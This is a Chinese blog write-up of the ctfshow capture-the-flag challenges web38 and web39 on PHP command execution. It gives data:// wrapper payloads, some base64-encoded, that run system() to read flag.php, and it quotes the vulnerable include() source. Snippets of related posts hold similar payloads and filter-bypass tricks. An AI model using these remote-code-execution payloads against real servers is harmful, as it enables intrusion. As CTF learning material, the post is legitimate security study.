ctfshow-web入门-命令执行-web38,web39

于 2022-06-25 11:45:14 发布
阅读量753 收藏 1
点赞数
分类专栏: ctfshow #命令执行 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HkD01L/article/details/125457121
版权

web38

姿势一 通过data伪协议加base64绕过过滤

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTs/Pg==

base64的解码是<?php system('tac flag.php');?>

 姿势二 通过data伪协议加php短标签和linux通配符绕过

 web39

直接收到的c后面再后缀.php

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

原来以为,用通配符打flag就行了,后来发现不是这样的

继续用data伪协议测试一下

最后面后缀的.php就是代码里加的后缀,用上一个payload也可以打

 

 

HkD01L
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
Ctfshow web入门-web38 WP
qq_45427131的博客
05-18 306
查看源代码发现对比上一题只是多了对php的过滤,对php的过滤影响到的是data协议rce时<?php语句的构造 不过<?php system(‘ls’);?>是可以简写将php省略的 <?php system(‘ls’);> 等于 <?=system(‘ls’);?> 这是作者的一个小实验: 构造payload http://f5d8e458-5d09-4ed5-aba4-98ddda953a5b.challenge.ctf.show:8080/?c=data
ctfshow学习记录-web入门命令执行29-38)
龟速更新的九某人
06-02 906
ctfshow学习记录-web入门(web29-38)
ctfshow-命令执行-web38
weixin_43400535的博客
11-03 3254
ctfshow-web38 文章目录ctfshow-web38题目描述:原理:审计:方法:思路:同web38利用data为协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1x
ctfshow之web入门-命令执行(1)web29-38
weixin_47726676的博客
04-22 242
题目来自CTFshow-web入门-命令执行 web29 安装hackbar 启动环境,看到正则表达式过滤掉flag error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 点击F12开启hackbar窗口,使用?c=phpinf
ctfshow学习记录-web入门(命令执行39-48)
龟速更新的九某人
06-06 840
ctfshow学习记录-web入门命令执行web39-48)
ctfshow-web41~60-WP
最新发布
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFshow web 入门持续更新 冲冲冲
giaogiao123的博客
10-06 453
*1 命令执行web29 很明显绕过就可以 上c=system(‘nl *’); web30 这里注意要绕过system 这就要用到echo函数 c=echo( nl *`); 同理web31过滤空格 用trb %09绕过 web32 这个题就比较骚了 过滤了echo system 空格 基本上上面的方法都没法用 那我们怎么去解题呢?? 首先尝试文件包含 include"/etc/passwd"?> 发现可以运行 这就说明可以运行的通,并且它没有过滤$ 还有一个问题include包含
ctfshow-web命令执行(web29-44)
m0_50268414的博客
11-29 572
ctfshow-web命令执行(web29-44)(Completed) 借着刷题的机会正好系统深入地了解以下世界上最好的语言–拍黄片~ 哦不,PHP~ 文章目录web29 ?绕过 cp命令web30 \`\`也可以当命令执行web31 GET字符逃逸web32 includeweb33 requireweb34 仍然includeweb35 还是includeweb36 还是一样web37 data伪协议web38 =代替phpweb39 php后缀web40 show_sourceweb41 只留下了
CTFshow 命令执行 web38
Kradress的博客
10-30 167
源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(
ctfshow web入门 命令执行部分 (37-40)
羽的博客
09-05 5067
39 限制了后缀,我们可以试试伪协议,以为不能带有flag,所以filter协议和php://input也不好用了。 最后试了试data协议,发现成功了。 payload c=data:text/plain,<?php system('cat f*')?> 这样就相当于执行了php语句<?php system('cat f*')?>.php 因为前面的php语句已经闭合了,所以后面的.php会被当成html页面直接显示在页面上,起不到什么作用。 40 这个题可能是出题人把英文括号打成
02_WebDriver-元素定位/操作元素方法
paidaxing_dashu的博客
03-14 519
一,WebDriver 元素定位方式 1. id 2. name 3. class_name 4. tag_name 5. link_text 6. partial_link_text 7. Xpath 8. Css 定位方式分类-汇总: 1). id、name、class_name:为元素属性定位 2). tag_name:为元素标签名称 3). link_text、partial_link_...
2021-04-27 Web前端编程实验(一)
APPDREAMER的博客
04-27 1287
Web前端编程实验(一) 前言 本次实验所用编程语言为html,所用编辑文本工具为记事本。 注意事项 (1)。 (2)由于实验结果需要上传视频,因此没有将相关实验结果图片放置于博客中。 (3)具体所有实验请参考博客 Web前端编程(一)~(八)。 实验一 1、实验题目。(注:题目如下) 2、本实验所需掌握知识。 (所需掌握知识一:文本处理) 代码格式 代码例子 实现效果 <u> 文本 </u> <u> 苹果 </u> 下划线 <..
Bugku-WEB-web38
fallingskies
01-08 675
参考web36https://blog.csdn.net/qq_41209264/article/details/112257878 根据提示,布尔盲注。 但测试后发现and被过滤,只能使用异或^ 空格也被过滤 逗号被过滤,使用mid((password)from(1)for(1))代替mid((password),1,1) 等号被过滤,使用不等号<> for被过滤,使用ascii取字符串第一个字符转换为ascii码 构造如下 username=admin'^(ascii(mid
WEB实验四2021.4.27
weixin_47786301的博客
04-25 1702
WEB实验四 实验目的及要求: (1) 握Jquery页面初始化方法 (2) 掌握Jquery的选择器的基本使用 (3) 掌握Jquery对DOM 的基本操作 实验内容: 1.使用jquery实现如下界面效果: 提示:  奇数行背景色:#FFF38F;偶数行背景色:#FFFFEE;选中行:#FF6500  选中行时,设置单选框选中状态  运行截图  代码: <!DOCTYPE html> <html lang="en"> <head> <meta
第 38 章 Web UI
weixin_33832340的博客
01-08 111
目录 38.1. user 38.2. Services 38.2.1. Traffic IP Groups 38.2.2. Pools 38.2.2.1. Edit 38.2.3. Virtual Servers 38.2.4. Status 38.1.user ssh user: root, passwd: default...
ctfshow-web入门爆破
08-30
在ctfshow-web入门爆破中,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码中的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值